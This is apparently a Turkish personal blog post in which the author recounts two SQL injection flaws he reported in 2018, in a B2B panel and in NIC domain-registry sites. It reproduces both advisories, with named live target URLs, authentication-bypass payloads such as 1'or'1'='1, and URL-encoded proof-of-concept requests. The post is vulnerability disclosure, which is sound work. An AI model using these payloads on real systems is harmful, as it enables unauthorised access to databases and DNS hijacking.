Benim Keşfettiğim Zaafiyetler

Burada da benim bulduğum sistem zaafiyetlerinden bahsedeceğim. 2018’de 2 tane keşfedilmemiş açık buldum ve bu açıkların paylaşıldığı platforma açıkları gönderim ve kabul edildi. Şimdi O açıklardan bahsedeceğim:

1) Pringle Computer Systems Limited adlı şirketin yazmış olduğu ve müşterilene sunmuş olduğu B2B sistemlerinde ByPass Sql injections açığı buldum ve panele yetkili olarak giriş yapmış bulunmaktaydım ve araştırdığımda bu açığı kimse keşfetmemiş. Bende platform da paylaştım. Aşağıda ayrıntılarına bakabilirsiniz

# Exploit Title: PCS B2B Script SQL İnjections

# Date: 14.01.2018

# Exploit Author: Ozan Agdepe

# Email: agdepeozan[at]gmail[dot]com

# Author twitter: twitter.com/OAdepe

# Author GitHub: https://github.com/0z4nAgd3p3

# #

# Google Dork: N/A

# Vendor Homepage: http://www.pringlepcs.co.uk

# Demo:http://www.renaultclaims.co.uk/

# Demo2: http://www.gekkoelite.co.uk/SR01_Login.aspx

# Tested on: KaliLinux_X64/ Win 7-8-10_x64

# # # Description:

# An attacker can exploit this vulnerability to read from the B2B database.

# The vulnerability allows an attacker to inject sql commands….

# #Exploit: # SQL Injection Type: ByPass SQL İnjections

# Payload: B2B Panel use ByPass SQL incetions command ” 1’or’1’=’1 “

2. Açığa gelecek olursak NIC siteleri dediğimiz sitelerde bulduğum açıktır. Öncelikle Nıc sitelerinden bahsedeceK olursak; Google-twitter-youtube-facebook-gmail vs vs sitelerinin Dns ayarlarının bulunduğu sistemdir. Yani bu panele girebilen bir saldırgan bu sitelerin Dns ayarlarını güncelleyerek istediği Dns’ye yönlendirerek hackleyebilir. Tıpkı 2012 Yılında “Emrullah Akdemir” abimin Nic.tr sitelerini yönlendirdiği gibi ilgili haber(tıklayınız)

Kısa tutayım açığı anlatacak olursak aşağı da ayrıntılı görebilirsiniz

# Exploit Title: .NIC SQL Vulnerability

# Google Dork: N/A

# Date: 02/01/2018

# Exploit Author: Ozan Agdepe

# Vendor Homepage: http://nic.ms & http://nic.ac

# Tested on: KaliLinux_X64/Win 7-8-10_x64

##################

# Exploit Author: Ozan Agdepe

# Email: agdepeozan@gmail.com

# Author web: Agdepe.net

# Author twitter: @OAdepe

# Author GitHub: https://github.com/0z4nAgd3p3

# ###################

# SQL Injection Type: ByPass SQL İnjections

# Parameter: query

# Page: /news-item-1?query= & /robots.txt?query= & /hello-world/images/images?query= bla bla bla…

# Attack: query’ OR ‘1’=’1′ —

# Description: # The vulnerability allows an attacker to inject sql commands….

# Proof of Concept:

1) http://localhost/robots.txt?query=query%27+AND+%271%27%3D%271%27+–+

http://localhost/news-item-1?query=query%27+AND+%271%27%3D%271%27+–+

http://localhost/faqs?query=query%27+AND+%271%27%3D%271%27+–+

# query%27+AND+%271%27%3D%271%27+–+

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir